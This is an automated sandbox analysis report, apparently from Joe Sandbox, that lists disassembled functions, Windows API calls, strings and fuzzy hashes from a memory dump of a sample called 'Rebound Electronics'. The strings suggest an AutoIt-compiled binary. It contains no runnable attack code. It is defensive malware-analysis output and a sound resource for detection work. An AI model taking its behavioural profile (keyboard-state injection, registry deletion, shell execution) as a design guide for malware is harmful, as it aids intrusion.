#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00C796E9
WSAGetLastError.WSOCK32(00000000), ref: 00C796F8
inet_ntoa.WSOCK32(?), ref: 00C79765
htons.WSOCK32(?,?,?,00000000,?), ref: 00C797AA

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: ErrorLast$htonsinet_ntoaselect
String ID:
API String ID: 500251541-0
Opcode ID: e19aae62a9f7c05c0b4d794a497d27c06ef11b185a0dd33a55f9ac96dbb76010
Instruction ID: 9ab6a02ed056fa41eeefe519ca3332097cfe75ee3ec9f0249fca199369a198b3
Opcode Fuzzy Hash: e19aae62a9f7c05c0b4d794a497d27c06ef11b185a0dd33a55f9ac96dbb76010
Instruction Fuzzy Hash: CA71AB71504240AFC714EF64DC85F6FB7A8EF85714F108A1DF56A9B2A1EB30DA04DB62

Function 00C4A979 Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE

Download Yara Rule

APIs

__mtinitlocknum.LIBCMT ref: 00C4A991

Part of subcall function 00C47D7C: __FF_MSGBANNER.LIBCMT ref: 00C47D91
Part of subcall function 00C47D7C: __NMSG_WRITE.LIBCMT ref: 00C47D98
Part of subcall function 00C47D7C: __malloc_crt.LIBCMT ref: 00C47DB8

__lock.LIBCMT ref: 00C4A9A4
__lock.LIBCMT ref: 00C4A9F0
InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00CD6DE0,00000018,00C55E7B,?,00000000,00000109), ref: 00C4AA0C
EnterCriticalSection.KERNEL32(8000000C,00CD6DE0,00000018,00C55E7B,?,00000000,00000109), ref: 00C4AA29
LeaveCriticalSection.KERNEL32(8000000C), ref: 00C4AA39

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
String ID:
API String ID: 1422805418-0
Opcode ID: c23cf19909f34f1d215f95296d0cf9c7db63796618a0d294c58e47ad6bebf945
Instruction ID: a83dca22d76530d31b825e0e81f259b6b762a31a3cb0d3be920d3dd8f91c5300
Opcode Fuzzy Hash: c23cf19909f34f1d215f95296d0cf9c7db63796618a0d294c58e47ad6bebf945
Instruction Fuzzy Hash: 43413671A402419BEB14DFA8DA8475CB7B0BF05335F208328E425AB2D2DBB49D41DF92

Function 00C88ECC Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00C88EE4
GetDC.USER32(00000000), ref: 00C88EEC
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C88EF7
ReleaseDC.USER32(00000000,00000000), ref: 00C88F03
CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00C88F3F
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00C88F50
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00C8BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00C88F8A
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00C88FAA

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 6b43752813981c805bb050eba21736c00e5988f126b2a3ed620df723d172b26b
Instruction ID: 25da84bbeb755704f69fd4449b15a685fbf3e1155127c70fdd6fbc045be30dde
Opcode Fuzzy Hash: 6b43752813981c805bb050eba21736c00e5988f126b2a3ed620df723d172b26b
Instruction Fuzzy Hash: 03314B72200614BFEB119F60CC4AFEA3BA9EF4A759F044065FE0A9B191DAB59841CB74

Function 00C716DA Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 309COMMON

Download Yara Rule

APIs

Part of subcall function 00C2936C: __swprintf.LIBCMT ref: 00C293AB
Part of subcall function 00C2936C: __itow.LIBCMT ref: 00C293DF

Part of subcall function 00C3C6F4: _wcscpy.LIBCMT ref: 00C3C717

_wcstok.LIBCMT ref: 00C7184E
_wcscpy.LIBCMT ref: 00C718DD
_memset.LIBCMT ref: 00C71910

Strings

X, xrefs: 00C71948

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 187d0ae765bdf4b334024921905ab7b3b26200a438dfe992f9fb48fbebefa826
Instruction ID: 0abe96775095e3cc8aca0af92ed4d122729f287b6150de28d2348a4adc9ce136
Opcode Fuzzy Hash: 187d0ae765bdf4b334024921905ab7b3b26200a438dfe992f9fb48fbebefa826
Instruction Fuzzy Hash: A8C1BF316043509FC724EF28D881A9EB7E4FF95350F04892DF99A976A2DB30ED45DB82

Function 00C90133 Relevance: 10.7, APIs: 7, Instructions: 245windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C3B34E: GetWindowLongW.USER32(?,000000EB), ref: 00C3B35F

GetSystemMetrics.USER32(0000000F), ref: 00C9016D
MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 00C9038D
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00C903AB
InvalidateRect.USER32(?,00000000,00000001,?), ref: 00C903D6
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00C903FF
ShowWindow.USER32(00000003,00000000), ref: 00C90421
DefDlgProcW.USER32(?,00000005,?,?), ref: 00C90440

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
String ID:
API String ID: 3356174886-0
Opcode ID: 4eea2a94dcf45e40a9dd123ee195720de6669b4f486e71636bb7481840e507dc
Instruction ID: e3561b5f6a0449a9d3dc752f1f0ddee8f01964eede849a4878697c0506366a84
Opcode Fuzzy Hash: 4eea2a94dcf45e40a9dd123ee195720de6669b4f486e71636bb7481840e507dc
Instruction Fuzzy Hash: B1A19E35600616EFDF18CF68C9897BDBBB1BF04701F288115ED65AB2A0D734AE60CB90

Function 00C3AE78 Relevance: 10.7, APIs: 7, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c93d525eacb38ada3d64656f3b7d7ef0dd0097d1408883d86a384676369f1a7
Instruction ID: ac64d5bc07acd9eb4d46f023dd7a124e837ec93e47967820886f57f021edfd2f
Opcode Fuzzy Hash: 2c93d525eacb38ada3d64656f3b7d7ef0dd0097d1408883d86a384676369f1a7
Instruction Fuzzy Hash: D9716CB1910109EFCF14CF99CC89AAEBB79FF89314F148149F966A7251C730AA51CF61

Function 00C82230 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C8225A
_memset.LIBCMT ref: 00C82323
ShellExecuteExW.SHELL32(?), ref: 00C82368

Part of subcall function 00C2936C: __swprintf.LIBCMT ref: 00C293AB
Part of subcall function 00C2936C: __itow.LIBCMT ref: 00C293DF

Part of subcall function 00C3C6F4: _wcscpy.LIBCMT ref: 00C3C717

CloseHandle.KERNEL32(00000000), ref: 00C8242F
FreeLibrary.KERNEL32(00000000), ref: 00C8243E

Strings

@, xrefs: 00C82334

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
String ID: @
API String ID: 4082843840-2766056989
Opcode ID: ecedcfa147367854eb89570cb85ccce61c15c04ee149696c9a76de15545b990e
Instruction ID: 02e9bdf38754b5bf050e402f58f7baada7f7a85378d6bac0a958273da2e8b956
Opcode Fuzzy Hash: ecedcfa147367854eb89570cb85ccce61c15c04ee149696c9a76de15545b990e
Instruction Fuzzy Hash: 3371B170A00629DFCF04EFA4D88599EB7F5FF48314F108459E856AB761CB34AE40DB94

Function 00C63DA8 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00C63DE7
GetKeyboardState.USER32(?), ref: 00C63DFC
SetKeyboardState.USER32(?), ref: 00C63E5D
PostMessageW.USER32(?,00000101,00000010,?), ref: 00C63E8B
PostMessageW.USER32(?,00000101,00000011,?), ref: 00C63EAA
PostMessageW.USER32(?,00000101,00000012,?), ref: 00C63EF0
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00C63F13

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 6c8ce595559789a26ee8f2df8a1c5d09b213b02a990946e1a2ee040b208eee32
Instruction ID: bb2bc3cebae19c9eb4e91fa3ddebbb90e36b21da564c7c6bc4f585b19cee8ddb
Opcode Fuzzy Hash: 6c8ce595559789a26ee8f2df8a1c5d09b213b02a990946e1a2ee040b208eee32
Instruction Fuzzy Hash: 9551D1A0A047D53DFB364764CC85BBABEA95F06304F088589F1E5468C3D3A9AFC4D761

Function 00C63BC3 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00C63C02
GetKeyboardState.USER32(?), ref: 00C63C17
SetKeyboardState.USER32(?), ref: 00C63C78
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00C63CA4
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00C63CC1
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00C63D05
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00C63D26

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 96824ca49790f375f0111c09bc07ec180770925cc74bbcce213865b46e2d924a
Instruction ID: 21ef121ffc1a1148b88f4199addf2a8a1b158eb4f81c7e85ddba4d52c260c903
Opcode Fuzzy Hash: 96824ca49790f375f0111c09bc07ec180770925cc74bbcce213865b46e2d924a
Instruction Fuzzy Hash: 8651F7A09147D53DFB3687348C85BBABFA96B06304F088588F1E5568C2D694EF84E760

Function 00C67DB1 Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00C67DBE
_wcsncpy.LIBCMT ref: 00C67DF3
_wcsncpy.LIBCMT ref: 00C67E25
_wcsncpy.LIBCMT ref: 00C67E58
_wcsncpy.LIBCMT ref: 00C67E9A
_wcsncpy.LIBCMT ref: 00C67ED4
_wcsncpy.LIBCMT ref: 00C67F03

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: 9bf3bb7d7a5b2ece1079eec01744fff49a755361f9b18c7fa3700898da9d96e3
Instruction ID: 12841f95faf8c87249253ff62fe5e4ed0d7202939318effa8c40d4c933d2b97e
Opcode Fuzzy Hash: 9bf3bb7d7a5b2ece1079eec01744fff49a755361f9b18c7fa3700898da9d96e3
Instruction Fuzzy Hash: 8B417E66C14214B6CB20EBF4C886ACFB3ACEF45710F548966F914E3121FA34E655C7A6

Function 00C83D72 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00C83DA1
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C83DCB
FreeLibrary.KERNEL32(00000000), ref: 00C83E80

Part of subcall function 00C83D72: RegCloseKey.ADVAPI32(?), ref: 00C83DE8
Part of subcall function 00C83D72: FreeLibrary.KERNEL32(?), ref: 00C83E3A
Part of subcall function 00C83D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00C83E5D

RegDeleteKeyW.ADVAPI32(?,?), ref: 00C83E25

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: d7150fcb9b8c6e7a6fb1fa42aed656870990e52b522d37fb6ddbf2a407cc67ff
Instruction ID: d950a9879ae334c86fb4ff73f8a6068f2c4b9a13ab178c18154da219a96b5d65
Opcode Fuzzy Hash: d7150fcb9b8c6e7a6fb1fa42aed656870990e52b522d37fb6ddbf2a407cc67ff
Instruction Fuzzy Hash: 92310BB1901119BFDB15AF90DC89AFFB7BCEF09704F00016AE523A2150D6749F899BA4

Function 00C88FC8 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00C88FE7
GetWindowLongW.USER32(018A0890,000000F0), ref: 00C8901A
GetWindowLongW.USER32(018A0890,000000F0), ref: 00C8904F
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00C89081
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00C890AB
GetWindowLongW.USER32(00000000,000000F0), ref: 00C890BC
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00C890D6

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: d002bf40a5d0beead0f2b3923a804be55805df5bd2ac181585864eee730f9035
Instruction ID: 11e07bd046cf6bc0efc20301feec8b0f601e56483f57482ca8bd539340fdc989
Opcode Fuzzy Hash: d002bf40a5d0beead0f2b3923a804be55805df5bd2ac181585864eee730f9035
Instruction Fuzzy Hash: E8313874640215EFDB21DF58DC84F6837A9FB4A718F180164FA2A8F2B1CB71AD50DB45

Function 00C608AF Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C608F2
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C60918
SysAllocString.OLEAUT32(00000000), ref: 00C6091B
SysAllocString.OLEAUT32(?), ref: 00C60939
SysFreeString.OLEAUT32(?), ref: 00C60942
StringFromGUID2.OLE32(?,?,00000028), ref: 00C60967
SysAllocString.OLEAUT32(?), ref: 00C60975

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: baeb72ce5ebed899193a4de010aa307536eba711ca626c2be0135cc1d3beddcf
Instruction ID: e88179bf7e8282f0d391a349fb73de2e4071c0cf54b82e4e16e5d6a224ebb2d0
Opcode Fuzzy Hash: baeb72ce5ebed899193a4de010aa307536eba711ca626c2be0135cc1d3beddcf
Instruction Fuzzy Hash: 0B21C972600208AF9B109F78DCC4EBF73ECEB09364B108525F916EB291D670ED41CB60

Function 00C62472 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00C62485
__wcsnicmp.LIBCMT ref: 00C624A6
__wcsnicmp.LIBCMT ref: 00C624C0

Strings

#OnAutoItStartRegister, xrefs: 00C624BA
#requireadmin, xrefs: 00C624A0
#notrayicon, xrefs: 00C6247D

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: 6a38b9d5092cc880f41f0daa56b60f09270de9220ff233461ae331d5c8849861
Instruction ID: 109bfd534ad64cbcb977476fce313ac66d5db095ffd0a900a7fc21e8df53e4ae
Opcode Fuzzy Hash: 6a38b9d5092cc880f41f0daa56b60f09270de9220ff233461ae331d5c8849861
Instruction Fuzzy Hash: 40218132544A1177C331AB34DC92FBB7398EF65310F644429F85797081EB559A42E3A9

Function 00C60986 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C609CB
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00C609F1
SysAllocString.OLEAUT32(00000000), ref: 00C609F4
SysAllocString.OLEAUT32 ref: 00C60A15
SysFreeString.OLEAUT32 ref: 00C60A1E
StringFromGUID2.OLE32(?,?,00000028), ref: 00C60A38
SysAllocString.OLEAUT32(?), ref: 00C60A46

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 0e65c61a2118ecb68367b525d18041f2df246e7c139c2bebb12cb14e9572482a
Instruction ID: 9ce3b0dca32f727a7d12f5c200e01b4a02a83bd650333ac7c5997533e3894271
Opcode Fuzzy Hash: 0e65c61a2118ecb68367b525d18041f2df246e7c139c2bebb12cb14e9572482a
Instruction Fuzzy Hash: 2721A135604204AFDB20DFE8CCC9EAB73ECEF093607108125F91ADB2A1E674ED419B64

Function 00C8A2C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C3D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C3D1BA
Part of subcall function 00C3D17C: GetStockObject.GDI32(00000011), ref: 00C3D1CE
Part of subcall function 00C3D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C3D1D8

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00C8A32D
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00C8A33A
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00C8A345
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00C8A354
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00C8A360

Strings

Msctls_Progress32, xrefs: 00C8A2FE

Memory Dump Source

Source File: 00000000.00000002.1690628875.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.1690581019.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690783262.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1690984413.0000000000CDA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691020811.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_114117914 - Rebound Electronics.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: c649d442f59724d2733f0c139cbc3fc9ea50cd69938e7663a3c927bedea690c4
Instruction ID: 263102963e97d1115569727cd54fe5d0c99e82dcb0be93c4beb1e85a1615a1c4
Opcode Fuzzy Hash: c649d442f59724d2733f0c139cbc3fc9ea50cd69938e7663a3c927bedea690c4
